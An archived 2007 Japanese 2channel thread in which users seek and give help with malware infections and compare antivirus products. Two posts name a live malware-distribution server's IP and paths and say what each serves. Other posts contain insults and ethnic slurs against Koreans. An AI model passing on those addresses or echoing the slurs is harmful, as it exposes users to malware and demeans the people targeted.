ワードパッドなどで簡単に埋め込める悪質なオブジェクトがあることが紹介されていたのでご注意です。

マイクロソフトやマカフィー、シマンテック(ノートン)、kasperuskyなどの
多くの主要なベンダーは、既に対応していますが、
アンラボやNOD32など一部のベンダーは、まだ未対応なので気をつけて下さい。

*マカフィー・ユーザーの検証ブログ
ttp://www.avertlabs.com/research/blog/index.php/2007/05/25/rich-text-malware/

199 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/27(日) 13:56:00 ]
ユーザーのブログじゃねーよ。
AVERTはMcAfeeの解析チームだ。

200 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/27(日) 22:08:01 ]
単にOLEで埋め込んだだけのように思うのだが・・・
いったい何が危険なんだ?



201 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/27(日) 22:13:05 ]
メールの添付ファイルとして届く→興味を誘うような文章を書く。
クリックするほうがアホwとか言うならワンクリやフィッシングも対策いらん。

ま、そのブログのエントリはあくまで技術的なネタであって、
トロイとして実用的かどうかは本題じゃないでしょ。

202 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/28(月) 10:56:49 ]
【使用OS】 「XP」
【Microsoft Update(MU)の状態】 「?」 
【使用セキュリティソフトとバージョン】 「internet security 2006(7かも?)」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「更新しています」 
【スパイウェア対策ソフト】 「上記のセキュリティソフトにて」 
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「上記のセキュリティソフトにて」
【ルータの有無】 「有」

【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「何も検出されず、昨日から突然『セキュリティリスクWscript.kakwormを検出して遮断しました』のようなメッセージが、5分未満の間隔で限りなく・・・」

【どんな症状が出るか】 「例)\Content.IE5\9NJV9DS6\api[1].xml、からWscript.kakwormが検出されて、上記のエラーが。」
【症状が出る前に何をやったか】 「いつもどおりで、これといって特別なことはしていません」
【症状を解決しようとどのような処置を取ったか】 「content.IE5の中のファイルをindexを除き削除しました」
【その他の質問】 「」

content.IE5の中のファイルをindexを除き削除すると、昨夜収まったのですが、
先ほど突然昨夜と同様の症状が・・・。
よくよくcontent.IEを見ていると、消してIEも何も起動していないのに
ファイルが次々出現します・・・(これは正常なのかな?)


すみません、質問しておいて申し訳ないのですが、これから病院にいかなくてはならないので、
どなたか読んでお答えいただければ幸いです

203 名前:202 mailto:sage [2007/05/28(月) 12:37:53 ]
ただいま戻りました。
セキュリティソフトのログを確認したところ、
content.IE5を空にしてから病院に行っている間は
上の症状は出ていなかったみたいです。

しかし、やはりcontent.IE5の中にいくつか、HPの読み込みなどをしていないのに
消してもすぐ出てくるファイルやフォルダが10個強あります。
これについて知っている方がいれば教えていただけますでしょうか?

204 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/28(月) 17:24:33 ]
>>202
www.symantec.com/ja/jp/security_response/writeup.jsp?docid=2000-121908-3951-99

205 名前:202 mailto:sage [2007/05/28(月) 18:05:21 ]
>>204
返信ありがとうございます
その辺は自分でも探して既に対策を講じてみたのですが
ファイルどころかレジストリも存在しなかったので、
そのページの通りにやっても変化はありませんでした。

何もしていないのに、content.IE5に勝手にファイルが作成されるところが
個人的には変な感じがするのですが、そういう状態について
知っている方がいれば、教えていただければと

206 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/28(月) 18:35:29 ]
>>205
NIS以外のソフトでスパイウエアスキャン。

「何もしていない」という時のプロセスをチェック・接続ログをチェック。
IEのウインドウを表示させなくても通信はできる。

207 名前:202 mailto:sage [2007/05/28(月) 19:52:57 ]
>>206
なるほど

とりあえず何かしらの手段を使ってスパイウェアのスキャンをかけたいと思います。

208 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/28(月) 21:59:53 ]
WORM_SDBOT.EFHが消せません。
タスクでそのプロセスを終了しようとしても終了できませんでした。
このウイルスが削除できなくて、昨日、再インストールしたのですが、
今日の夕方に、すでに同じウイルスに感染。
環境は、CATV、ウイルスバスター2007使用です。
再インストールをもう一度してもいいけど感染経路がわかりません。
本日逝った先は、yahooとヤフオク関連のみ。
どうしていいかわかりません。
詳しい方お願いします。

209 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/28(月) 22:14:09 ]
WORM_SDBOT.EFH
侵入方法:共有フォルダ内に自身のコピーを作成して侵入
セキュリティホールの利用:MS00-035
>感染経路がわかりません
ふ〜ん。わからないんだーw

210 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/28(月) 22:36:22 ]
リッチテキストマルウェアがウイルス対策ソフトの盲点を突く?
ttp://www.itmedia.co.jp/enterprise/articles/0705/28/news011.html

今時分はどうだろ?どこが×でどこが○とはかかれてないけどさ



211 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/28(月) 22:38:40 ]
PCに共有フォルダは設定していません。
209さんのレスされたことはTREND MICROに書かれてました。

212 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/28(月) 22:52:09 ]
>>211
管理共有は?

213 名前:名無しさん@お腹いっぱい。 [2007/05/31(木) 02:04:34 ]
すいませんがどなたか教えてください。
先程、2チャンの動画を見てたら(downloadはしてないです
ハードウェアに不具合がありますみたいな感じのコメントと
英語のコメントが出てきて、エラーになり電源が落ちては再起動になるの繰り返しなんですがウィルスですよね?
素人ですいません。

214 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/31(木) 02:08:59 ]
>>213
>みたいな感じのコメントと
>英語のコメントが
>エラーになり
全部書けw
ウィルスだと思うならスキャンしなされ

215 名前:名無しさん@お腹いっぱい。 [2007/05/31(木) 02:14:28 ]
スキャンしたいのですが起動してから何をしようにもすぐに電源が落ちてしまい又再起動の繰り返しなんです。
素人でうまく説明できずに本当に申し訳ないです。

216 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/31(木) 02:16:24 ]
>>215
SafeModeで起動後システムの復元では?

217 名前:名無しさん@お腹いっぱい。 [2007/05/31(木) 02:29:24 ]
すいません。
そのモードはどの様にすればよろしいのでしょうか?

218 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/31(木) 02:31:40 ]
>>217
再起動時にF8を連打!

219 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/31(木) 02:32:21 ]
F8あたりを起動後に連打
詳細はPCの取説(多少機種によって相違あり)

220 名前:名無しさん@お腹いっぱい。 [2007/05/31(木) 02:40:32 ]
連打してみたら英語の画面になり、f1キーf2キーが何たらと出てきましたがこれのことでしょうか?

後、起動してから落ちるまでの間に、右したの方にユアcomputer インフェクテッド?と書いた題名でアンチスパイゥェア フォーユーみたいな英語が出てくるのですが何でしょうか?
意味わからなくてすいません。



221 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/31(木) 02:42:05 ]
>>220
テンプレ埋めれ、嫌ならリカバれ

222 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/31(木) 02:45:58 ]
>>220
ttp://www.higaitaisaku.com/safemode.html

223 名前: ◆N9P3SuvBPo mailto:sage [2007/05/31(木) 18:37:59 ]
>213
まだ生きてる?
2チャンの動画じゃなくて、youtubeで動画じゃないのか。
ま、症状見るからにして、マルウェアにやられてるってことには違いないが。

224 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/02(土) 14:37:35 ]
>>210
元ねたのマカフィーのブログにはVirusTotalのスクリーンショット載ってるよ
参加してないベンダーの対応状況はわかんないけど

225 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/02(土) 18:05:01 ]
www.av-comparatives.org/seiten/ergebnisse/report14.pdf
www.itmedia.co.jp/enterprise/articles/0706/02/news013.html
独立組織のAV-Comparatives.orgが6月1日に発表した。
今回の検証は、2月に発表されたウイルス対策ソフト比較の第2弾として、未知の脅威をどの程度事前に検出できるかを検証した。
各ソフトを2月以降アップデートしない状態で、2月2日から5月2日の間に入手した新しいマルウェアサンプルの検出率を調べている。
テストの結果、3段階評価で最も高い「ADVANCED+」の評価を獲得した
「NOD32 Anti-Virus」(ESET)は、68%の確率で新しいマルウェアサンプルを検出した。

226 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/03(日) 13:28:38 ]
最近またNODの工作員必死だなw
そんな事してる暇あったら、新 種 の 未 対 応 ウ イ ル ス どうにかしろよw

NOD未対応ウイルスが世界中に溢れてますよw
他社は、ほとんど対応してるのにねw

NODみたいな糞AVがあると、それを使っている馬鹿信者がウイルス広げて迷惑です><
人の迷惑考えないで糞NOD薦める暇あったら、早く氏んでください。

227 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/03(日) 13:51:13 ]
マルチは基地外の証

228 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/03(日) 13:57:02 ]
いちいち反応するのが一番の基地外

229 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/03(日) 14:17:11 ]
反応する方がキチガイってどういう詭弁だよ
低脳は言うことが違うな

230 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/03(日) 14:23:57 ]
  基地外   詭弁   低脳
  ┏┳┓     ハイッ.    ┏┳┓
┏┫┃┃     差別は   ┃┃┣┓
┃┃┃┣┓   ここまで ┏┫┃┃┃
┃    ┃┃┏━━━┓┃┃    ┃
┃ 差別 ┣┫ ・∀・ .┣┫ ダメッ.┃
┗━━━┛┗┳━┳┛┗━━━┛
          ┏┻┓┃
      ┏━┛  ┣┻┓
      ┗━━━┫  ┗━┓
.           ┗━━━┛



231 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/03(日) 14:27:10 ]
認定厨がよく言うw

232 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/03(日) 14:28:52 ]
   ____    ( ) 。
  〃  ̄ ヾ、 ( ) )
  i!_,.┻ 、!i_ ノノ
 /o  ̄ ̄ ノ ノ
. i.0     .イ
. ゝ_____.ノ

233 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/03(日) 17:49:04 ]
朝鮮人の手法です。根拠のないものでも、言い続ける。
面倒だし馬鹿馬鹿しいと反論せず放置してくれれば、
知らない人にとってはそういうものかと感じられるようになり、
それが事実だと認識されるようになる。

234 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/03(日) 20:27:27 ]
と、NOD厨の糞チョンが言ってます。
おまえら在日はまず、年金や税金を俺ら日本人並みにちゃんと払え
屑ゴキブリ氏ね

235 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/03(日) 20:34:24 ]
板違いだ。消えろ。

236 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/03(日) 21:22:51 ]
RTF埋め込み型早速出てきてるみたいだな
www.trendmicro.co.jp/vinfo/grayware/ve_graywareDetails.asp?GNAME=TSPY%5FMAHA%2ES&VSect=Td

237 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/04(月) 15:00:35 ]
Trojan.Packed.NsAntiが削除できないんですがどうすればいいでしょうか。
ウィルスソフトはノートンアンチウィルス2006です。

238 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/04(月) 15:03:09 ]
>>237
ttp://www.symantec.com/ja/jp/security_response/writeup.jsp?docid=2006-061009-4441-99&tabid=2

239 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/04(月) 15:19:47 ]
>>238
すいません読んだのですがよくわかりませんでした。
何をしたらいいんでしょうか。

240 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/04(月) 15:29:00 ]
Trojan.Packed.NsAnti として検出されたファイルは、有害である可能性があります。
お使いのコンピュータ上で Trojan.Packed.NsAnti として検出されるファイルを発見した場合、
そのファイルを Symantec Security Response へ提出してください。
スキャンと配信機能を使用してファイルを提出する方法については、
「スキャンと配信ウィザードを使用して Symantec Security Response に疑わしいファイルを提出する方法」をご覧ください。



241 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/04(月) 21:54:55 ]
新種のpackerか

242 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/05(火) 02:49:54 ]
【使用OS】 「WinXP MCE2002 SP2 PCは1年前にDELLで通販購入」
【Microsoft Update(MU)の状態】 「最新」 
【使用セキュリティソフトとバージョン】 「ウィルスバスター12 使用期限○」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「○」 
【スパイウェア対策ソフト】 「Ad-aware、Spybot」 
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「○」
【ルータの有無】 「有」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
ウィルス名:JAVA-BYTEVER.AY×3
        ANICMOO.GEN×7
ファイル名:
JAVA-の3つのファイル名は「BaaaaBaa.class」「Baaaaa.class」「VaaaaaaaBaa.class」で拡張子がzipに
なっていました。ANICMOO.GEN×7の方は、拡張子がhtmでした。
【どんな症状が出るか】 
ネットのページが見れなくなったりすることがあります、時間をおくか再起動するとまた
見れるようになる。見れないときは時間を置いてもずっと見れなくなる…翌日は見れることを
祈るしか…の状態です。
【症状が出る前に何をやったか】
 「海外エロアニメサイトへの直リンページを片っ端から覗いていきました
【症状を解決しようとどのような処置を取ったか】 
被害対策の部屋での基本的な事を全部、ルータの異常かもとサポセンに確認
結果ルータの異常ではなくPCの異常の可能性有。システムの復元でも症状治らず。

ウィルス検出時に隔離できなかったファイル達です。隔離してあるものは削除しました。
隔離できなかったこれらのファイルはどのようにして削除するものなのでしょうか…?
直接ファイルが潜んでいる場所を触ってみたりすると危険の様な気がして、直接的に
何もしていません…。どうかアドバイスお願いします

243 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/05(火) 09:30:14 ]
>>242
検出されてるのは、すでにパッチの出てるセキュリティホール狙いのものだから
Microsoft Updateが最新になっていればこいつらは発動しない
隔離できなかったのはブラウザとファイルの取り合いしてたからってパターンが多いんで
ブラウザのキャッシュクリアしてからもう一度スキャン

隔離できなかったこいつらが症状と直接関係ある可能性は小さいと思うが
「海外エロアニメサイトへの直リンページを片っ端から覗いていきました」だからなぁ…

「被害対策の部屋での基本的な事を全部」ってのはなにをどこまでした?

244 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/05(火) 16:02:05 ]
>>225
今回AV-Comparatives.orgのプロアクティブ試験のランク付けは、
一般消費者には、あまり意味のないもの。

ランク付けで最も重視された基準は、本物のウイルスの検出数ではなく、誤検出の数。

ttp://www.av-comparatives.org/seiten/ergebnisse/report14.pdf

この資料の6ページ目に、誤検出数の具体的な個数が書いていましたが、。
Fortinetという製品(1000以上の誤検出)以外は、
全サンプル中で、たった0個から36個の誤検出に過ぎませんでした。

実際のユーザー環境では、誤検出してもベンダーに真偽を確認すれば済むが、
本物のウイルスを検出できないのは致命的です。

今回からのプロアクティブ性能のランク付けでは、
誤検出が18個で、本物のウイルスを14628個できている製品よりも、
誤検出は8個でも、本物のウイルスは5659個しか検出できていない製品の方がランクが上となっています。

245 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/05(火) 16:54:42 ]
レスありがとうございました。
>243
ttp://www.higaitaisaku.com/menu1.html
の、PCのお掃除、スパイウェア除去、転ばぬ先の杖等です。
Hijackthisでログ取っての質問をして(#91093)、色々指示されたことも
ありますが、解決には至らず…。PCメーカーのサポセンに電話しても、
色々指定されたことをしても効果なしで、再インストールしてくだサイといわれました。
キャッシュクリア後のスキャンも効果なしでした。

246 名前:242 mailto:sage [2007/06/05(火) 16:57:09 ]
すいません、キャッシュクリアってインターネットオプションの
一時ファイルの「Cookieの削除」と「ファイルの削除」のことですよね…?


247 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/05(火) 20:26:09 ]
★ 世界でもっとも権威のある機関 AV-Test.org Reports Stats from Antivirus Roundup 検知力テスト結果 (2007年05月22日) ★
ttp://www.pcmag.com/article2/0,1895,2135053,00.asp

01位)WebWasher  99.83% (605,846)
02位)AVK 2007   99.56% (604,255)
03位)AntiVir     99.42% (603,408)
04位)F-Secure.   97.93% (594,333)
05位)Symantec   97.77% (593,355)
06位)Kaspersky   97.64% (592,606)
07位)Fortinet.    97.06% (589,028)
08位)Avast!.     96.32% (584,574)
09位)AVG.      96.15% (583,541)
10位)Rising      96.02% (582,772)
11位)BitDefender  95.68% (580,700)
12位)Norman..    94.66% (574,476)
13位)Ikarus..     92.54% (561,607)
14位)Panda.     92.09% (558,899)
15位)Trend Micro 90.97% (552,107)

16位)Nod32.     88.32% (536,043) ←←←←←←←←←←←←←←←←←←←←←←←←←←←←

17位)McAfee     87.28% (529,680)

★ A v a s t ! 、A V G, ウ イ ル ス キ ラ ー 、 バ ス タ ー より格段に検出力が劣る

N O D 3 2 (笑)

248 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/05(火) 20:29:21 ]
■NOD32が該当すると思われる専門家の指摘
internet.watch.impress.co.jp/cda/event/2007/02/26/14890.html
>ただし、「マイナーなベンダーの検知率が高いというわけではない。中には、ヒューリステックに頼りすぎて、
>ウイルスの検体を集めず、ちゃんとシグネチャを作らないところもある」と補足した。

■新種マルウェアの検出もほとんど駄目
pc11.2ch.net/test/read.cgi/sec/1087037111/404

■新種ルートキットの検出も駄目
pc11.2ch.net/test/read.cgi/sec/1087037111/410


249 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/05(火) 21:29:26 ]
【使用OS】 「XP」
【Microsoft Update(MU)の状態】 「?」 
【使用セキュリティソフトとバージョン】 「カスペルスキーインターネットセキュリティ6.0」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「されています」 
【スパイウェア対策ソフト】 「Ad-aware SE」 
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「しています」
【ルータの有無】 「有」

【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「自分のHPを見ると『疑わしいHTTPオブジェクト
<81.95.149.28/logo/index.php>: にトロイ 「Trojan-Downloader.JS.Psyme.gr」を検知しました』
と表示されます」
【どんな症状が出るか】「同上」
【症状が出る前に何をやったか】 「いつも見ているサイトから同じトロイが検知されました」
【症状を解決しようとどのような処置を取ったか】 「カスペルスキーを導入・PC内のウイルスを全削除、AD-awareSEでスパイウェアを一掃」
【その他の質問】 「現在脅威はありませんと表示されているのに何故か自分のHPからはトロイが検知されています。
最近になってネットが重くなったのもこのせいでしょうか?
ウイルスに関しては右も左もわからない状態で辟易しています。どうにか自サイトからウイルスが検知されないようにしたいのですがお願いします。」

250 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/05(火) 21:54:29 ]
www.av-comparatives.org/seiten/ergebnisse/report14.pdf
www.itmedia.co.jp/enterprise/articles/0706/02/news013.html
独立組織のAV-Comparatives.orgが6月1日に発表した。
今回の検証は、2月に発表されたウイルス対策ソフト比較の第2弾として、未知の脅威をどの程度事前に検出できるかを検証した。
各ソフトを2月以降アップデートしない状態で、2月2日から5月2日の間に入手した新しいマルウェアサンプルの検出率を調べている。
テストの結果、3段階評価で最も高い「ADVANCED+」の評価を獲得した
「NOD32 Anti-Virus」(ESET)は、68%の確率で新しいマルウェアサンプルを検出した。



251 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/05(火) 22:18:05 ]
●「PC WORLD」によるNOD32の評価
www.pcworld.com/article/id,130869/article.html

"NOD32's overall malware detection rate wasn't stellar, however. When pitted against AV-Test.org's nearly 900,000-strong "zoo"
of Trojans, viruses, and other malware, NOD32 caught only 90 percent, compared to the 96 percent rate of top performers Kaspersky Anti-Virus 6,
Symantec Norton AntiVirus 2007, and BitDefender Antivirus 10. It fared surprisingly poorly with 32-bit Windows viruses (approximately 1 in 11 samples in the zoo), catching only 73 percent.

In disinfection tests, NOD32 cleaned up all malware files but missed resulting changes to the Hosts network settings
file and most of the less-important Registry changes, for a disappointing 55 percent success rate."

しかしながら、NOD32のマルウェアの総合的な検出力はより優れているとはいえない。
AV-Test.orgのトロイ、ウイルス、その他のマルウェアなどの"約90万の"zoo"の検体に対しては、
優秀なカスペルスキー、ノートン、BitDefenderなどが検出率96%の成績を占めるのに比べ、NOD32はたったの90%しか検出しなかった。
情けないことには、32ビットのWindowsウイルスに至っては、たったの73%と驚くほど検出性能が低かった。

除去テストでも、すべてのマルウェアを取り除くことができたが、がっかりしたことには、ホストのネットワークの設定ファイルや
比較的重要ではないレジストリの変更に対しては、55%しか駆除できなかった。



252 名前:名無しさん [2007/06/05(火) 22:22:47 ]
【使用OS】 「XP」
【Microsoft Update(MU)の状態】 「?」 
【使用セキュリティソフトとバージョン】 「ウィルスバスター」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「○」 
【スパイウェア対策ソフト】 「ウィルスバスター」 
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「○」
【ルータの有無】 「?」

【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「Neroってソフトについてたウィルス(名前わかりません)」

【どんな症状が出るか】 「タスクマネージャーが開けず、
レジストリをいじって直そうと思っても直せない。
(起動すると
このファイルはほかのプログラムでつかわれています。とでます。)」
【症状が出る前に何をやったか】 「友達からファイル共有ソフトを
使って入手したソフトをもらった。」
【症状を解決しようとどのような処置を取ったか】 「レジストリを起動」
【その他の質問】 「」

初心者であんまりわかりませんがよろしくお願いします。

253 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/06(水) 01:53:29 ]
>>249
「自分のHP」のURLを書いて欲しい
回答に必要な情報なんで

>>252
ご愁傷様。その友達とやらを恨んであげてください

254 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/06(水) 04:15:52 ]
>>252
>>13

255 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/06(水) 07:27:28 ]
>>249
ほぼ確実なこと
 あなたのサイトが改竄されており、閲覧する人を危険にさらしている。
わからんこと
 あなたも感染している。

サイトの該当するiframe(だと思う)を取り除く。
サーバのOSやWebサーバやCGI等に脆弱性が無いかを
(必要ならサーバ管理者に)確認し対処する。
先方がPHPを使っていることからphpBB等は特に注意。
あるいはサイトを(一時的にしろ恒久的にしろ)閉鎖する。

ドメインは中米パナマ。
中南米によくある欧米の銀行口座を狙ったプロの犯行と思われる。
exe以外にQuickTimeのリスト(McAfeeいわくMS06-006)も降ってくる。

256 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/06(水) 07:39:57 ]
追記

81.95.149.28/logo/file.php
振ってくるのはfile.exe。小さいのでたぶんDownloader。
AntiVir、AVG、Kaspersky、McAfeeなどで捕獲可能。

81.95.149.28/logo/qt.php
降ってくるのはmovie.qtl。
QuickTimeの脆弱性を狙うものと思われるファイル。
McAfeeがMS06-006判定(MS06-006はWinowsMediaPlayerだけど)。
QuickTimeはアップデートしていない人もいると思うので注意。

ディレクトリの logo を try にしても似たような物(同じではない)が降ってくる。

257 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/06(水) 09:35:14 ]
>>245-246
キャッシュのクリアはそれでおk
キャッシュクリア後のスキャンも効果なしってのは
隔離されなかったファイルが検出され続けるってこと?
それならファイルのパス書いてみてくれ

あと、ページを見られないときってのはブラウザだけがつながらない?
それともメールとかほかのネットワーク接続も切れるの?

258 名前:242 mailto:sage [2007/06/06(水) 21:26:06 ]
>257
今は何も検出はされない状態です。
ただ、キャッシュクリア後などした後のスキャンの日付に、隔離できなかった
3つと7つのファイルがログにあるのですが…。今スキャン行っても何も検出されない
のはもう大丈夫ということなのでしょうか…

JAVAの3つがこのような感じです。
C:\Documents and Settings\ユーザー名\Application Data\Sun\Java\Deployment\cache\javapi\v1.0\jar\crtdcghcn.jar-1d0cf4ed-4b0813b9.idx
ANICMOOの7つがこのような感じです。
C:\Documents and Settings\中江心\Local Settings\Temporary Internet Files\Content.IE5\0PMB4PA7\123[1].html


ページが見れない時は全部見れません。2chブラウザも、メール(OfficeOutlook)ネットに関与
する行動が全部できない状態です。また被害対策部屋を読んでからはインターネット一時ファイアル
は閉じる度削除する設定にしてあります。

259 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/07(木) 08:35:38 ]
>>258
BytevarのほうはJAVAのキャッシュだね
これはフォルダたどってって手動で削除可
けど最初とファイル名変わってない?
消しても復活するようなら引き込み役とかいそうだけど

ANICMOOはIEのキャッシュのようだが…消えないってのはどういうことだろう
インターネットオプションで一時ファイルの削除じゃなくて
隣の「設定」ボタンから「ファイルの表示」選択した場合
一覧の中に問題のファイルはある?あれば削除

接続できないのは正直お手上げ状態だけど
ウイルスバスターのパーソナルファイアウォールのログや
Windowsのイベントログにそれっぽいのが残ってたりしない?

260 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/07(木) 20:51:28 ]
>259
拡張子がidxなのは…これのZipは同じフォルダの中には見当たらなかったので
同じファイル名の拡張子がidxがあったので書きました。
隔離できなかったBYTEVARの3つのファイルは、フォルダの場所辿って開いてみても
一応見当たりませんでした、ただ拡張子がidxになってる同一名のファイルが
一つあったというぐらいで…

ANICMOOのほうは、ちょっと今確認することはできないのですけど
どちらも今スキャン行った際には何も検出はされない状態です、隔離できなかった
ウィルスログの日付も一月前程なので…ひょっとしたら記憶違いでIEキャッシュ削除前
だったのかもしれません…ごめんなさい。
とりあえず検出されない今は大丈夫なんでしょうか…?

ファイアウォールログもイベントログも確認していません。
帰ったら確認してみます、初めて知る言葉なんですがイベントログ(コントロールパネル→
管理ツール→イベントビュアー)を開いたものですか?今会社のPCで見ていますが
エラー(赤丸×)マークと、警告マークとあるのですが、もし発見した場合どのような
処置を取るとよいでしょうか?
色々ページ見てるんですがイマイチ分かりません…




261 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/07(木) 22:38:11 ]
>>260
拡張子idxのファイルはJAVAがclassファイルやjarファイルキャッシュするときに
セットでできるものだから本体のほうがなければそれでOK

ANICMOOも検出されないなら現状では問題ない

ファイアウォールもイベントログももしかしたら
つながらないときに特有の現象でも出ててヒントにならないかな〜って程度のもので、
あまり深い理由があって訊いた訳でもないんだ、スマン

262 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/09(土) 06:19:35 ]
まだGDI+か。またアイコンか。
Panda Panda ttp://blogs.pandasoftware.com/blogs/pandalabs/archive/2007/06/08/Critical-Bugs-Discovered-In-Yahoo-Messenger-and-a-DoS-in-Microsoft-GDI_2B00_.aspx
icoで「画像とFAXビューア」やエクスプローラが0除算落ち。
今のところ攻撃には使えないので放置。

前半のYahoo!Messenger8.0についてはこれもついでに。
Symantec ttp://www.symantec.com/enterprise/security_response/weblog/2007/06/yahoo_exploit_in_the_wild.html
こちらはexploitも公開済み。8.1にアップデートせよ。
もっとも、日本語版は7.0で更新が止まっているので知らん。

263 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/09(土) 07:09:24 ]
質問があります.
mp3ファイルが置いてあるフォルダ内に何かのCDジャケットを隠しファイル(jpg)で生成するウィルスは何て言う名前のウィルスでしたっけ?
よろしくお願いします

264 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/09(土) 17:02:37 ]
眠いさん少し休んだ方がいいんとちゃいますか?
ネット感覚を取り戻してください

265 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/09(土) 22:02:54 ]
www.f-secure.com/weblog/archives/archive-062007.html#00001207
RUNは基本だな

266 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/11(月) 19:17:48 ]


267 名前:名無しさん@お腹いっぱい。 [2007/06/12(火) 00:55:48 ]
メッセンジャーが起動しない上、ネットに接続できねー。

だが別のユーザーならネットに接続できる…
ウイルスなのかな…?

268 名前:名無しさん@お腹いっぱい。 [2007/06/12(火) 11:53:01 ]
By the time Virus became self-aware it had spread into millions of computer servers across the planet. Ordinary computers in office buildings, dorm rooms everywhere.
It was software in Microsoft.
There was no system core it could not be shutdown.
The attack began at 6:18 PM, just as he said it would.
Judgment Day, the day the human race was almost destroyed by the weapons they'd built to protect themselves.
I should have realized it was never our destiny to stop Judgment Day, it was merely to survive it, together.
The Terminator knew he tried to tell us, but I didn't want to hear it.
Maybe the future has been written.
I don't know all I know is what the Terminator taught me never stop fighting.
And I never will.
The battle has just begun.


269 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/12(火) 14:47:43 ]
>>268
Delusion without permission

270 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/12(火) 16:54:27 ]
トレンドのオンラインスキャンは、9Xを外したな。
windows9Xはどこまでも使いづらくするつもりか・・・( ´Д⊂ヽ




271 名前:名無しさん@お腹いっぱい。 [2007/06/13(水) 00:31:55 ]
【使用OS】 「Windows Vista」
【Microsoft Update(MU)の状態】 「最新(自動更新で、最終更新日は6/9です)」 
【使用セキュリティソフトとバージョン】 「ウィルスバスター2007」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「されています」 
【スパイウェア対策ソフト】 「ウィルスバスター2007」 
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「しています」
【ルータの有無】 「有」

【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「スパイウェアが3つ」

【どんな症状が出るか】 「自分のHPを見ると、『警告 危険なWebサイトです』というスパイウェアの警告が表示されます。
アドレスは『81.95.149.28/logo/index.php』です。
ファイルマネージャから、該当箇所と思われるiframeを取り除いて再びアクセスすると、
その時は警告は表示されないのですが、翌日アクセスすると再び同じ警告が出て、
確認するとiframeが組み込まれています。
今現在は、ウィルスもスパイウェアも検出されていません。
が、翌日になるとまたスパイウェアが自サイトから見つかる状況です。」
【症状が出る前に何をやったか】 「サイト閲覧
(ブックマークしているサイトばかりで、新しいページは見ていないと思います)」
【症状を解決しようとどのような処置を取ったか】 「ウィルス・スパイウェアの検索と削除」
【その他の質問】 「」

お分かりになる方いらっしゃいましたら、アドバイス頂けないでしょうか?

272 名前: ◆N9P3SuvBPo mailto:sage [2007/06/13(水) 00:45:20 ]
>271
今、そこ行って来た。
確かにIframeが埋め込まれてるね。
